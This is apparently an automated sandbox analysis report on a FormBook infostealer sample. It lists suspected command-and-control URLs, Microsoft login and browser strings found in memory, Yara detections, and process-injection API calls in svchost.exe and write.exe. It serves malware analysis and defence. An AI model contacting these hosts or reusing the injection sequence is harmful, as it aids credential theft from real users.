20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:57:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:57:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: write.exe, 0000000B.00000002.3747327536.0000000005C22000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.00000000039E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs
            Source: UCAmCgWJyh.exe, 0000000D.00000002.3748863633.0000000004F8E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nmh6.site
            Source: UCAmCgWJyh.exe, 0000000D.00000002.3748863633.0000000004F8E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nmh6.site/8qne/
            Source: write.exe, 0000000B.00000002.3747327536.0000000005448000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000003208000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6329.vhjhbv.com/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UC
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 0000000B.00000002.3747327536.00000000055DA000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.000000000339A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 0000000B.00000003.1913753379.00000000078CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042C3B3 NtClose,8_2_0042C3B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772B60 NtClose,LdrInitializeThunk,8_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037735C0 NtCreateMutant,LdrInitializeThunk,8_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03774340 NtSetContextThread,8_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03774650 NtSuspendThread,8_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772BF0 NtAllocateVirtualMemory,8_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772BE0 NtQueryValueKey,8_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772BA0 NtEnumerateValueKey,8_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772B80 NtQueryInformationFile,8_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772AF0 NtWriteFile,8_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772AD0 NtReadFile,8_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772AB0 NtWaitForSingleObject,8_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772F60 NtCreateProcessEx,8_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772F30 NtCreateSection,8_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772FE0 NtCreateFile,8_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772FB0 NtResumeThread,8_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772FA0 NtQuerySection,8_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772F90 NtProtectVirtualMemory,8_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772E30 NtWriteVirtualMemory,8_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772EE0 NtQueueApcThread,8_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772EA0 NtAdjustPrivilegesToken,8_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772E80 NtReadVirtualMemory,8_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772D30 NtUnmapViewOfSection,8_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772D10 NtMapViewOfSection,8_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772D00 NtSetInformationFile,8_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772DD0 NtDelayExecution,8_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772DB0 NtEnumerateKey,8_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772C60 NtCreateKey,8_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772C00 NtQueryInformationProcess,8_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772CF0 NtOpenProcess,8_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772CC0 NtQueryVirtualMemory,8_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772CA0 NtQueryInformationToken,8_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773010 NtOpenDirectoryObject,8_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773090 NtSetValueKey,8_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037739B0 NtGetContextThread,8_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773D70 NtOpenThread,8_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03773D10 NtOpenProcessToken,8_2_03773D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04784650 NtSuspendThread,LdrInitializeThunk,11_2_04784650
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04784340 NtSetContextThread,LdrInitializeThunk,11_2_04784340
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04782C70
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782C60 NtCreateKey,LdrInitializeThunk,11_2_04782C60
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04782CA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04782D30
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04782D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04782DF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782DD0 NtDelayExecution,LdrInitializeThunk,11_2_04782DD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04782EE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04782E80
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782F30 NtCreateSection,LdrInitializeThunk,11_2_04782F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782FE0 NtCreateFile,LdrInitializeThunk,11_2_04782FE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782FB0 NtResumeThread,LdrInitializeThunk,11_2_04782FB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782AF0 NtWriteFile,LdrInitializeThunk,11_2_04782AF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782AD0 NtReadFile,LdrInitializeThunk,11_2_04782AD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782B60 NtClose,LdrInitializeThunk,11_2_04782B60
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04782BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04782BE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04782BA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047835C0 NtCreateMutant,LdrInitializeThunk,11_2_047835C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047839B0 NtGetContextThread,LdrInitializeThunk,11_2_047839B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782C00 NtQueryInformationProcess,11_2_04782C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782CF0 NtOpenProcess,11_2_04782CF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782CC0 NtQueryVirtualMemory,11_2_04782CC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782D00 NtSetInformationFile,11_2_04782D00
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782DB0 NtEnumerateKey,11_2_04782DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782E30 NtWriteVirtualMemory,11_2_04782E30
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782EA0 NtAdjustPrivilegesToken,11_2_04782EA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782F60 NtCreateProcessEx,11_2_04782F60
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782FA0 NtQuerySection,11_2_04782FA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782F90 NtProtectVirtualMemory,11_2_04782F90
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782AB0 NtWaitForSingleObject,11_2_04782AB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04782B80 NtQueryInformationFile,11_2_04782B80
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04783010 NtOpenDirectoryObject,11_2_04783010
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04783090 NtSetValueKey,11_2_04783090
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04783D70 NtOpenThread,11_2_04783D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04783D10 NtOpenProcessToken,11_2_04783D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00558DB0 NtCreateFile,11_2_00558DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00558F20 NtReadFile,11_2_00558F20
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00559010 NtDeleteFile,11_2_00559010
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005590B0 NtClose,11_2_005590B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00559210 NtAllocateVirtualMemory,11_2_00559210
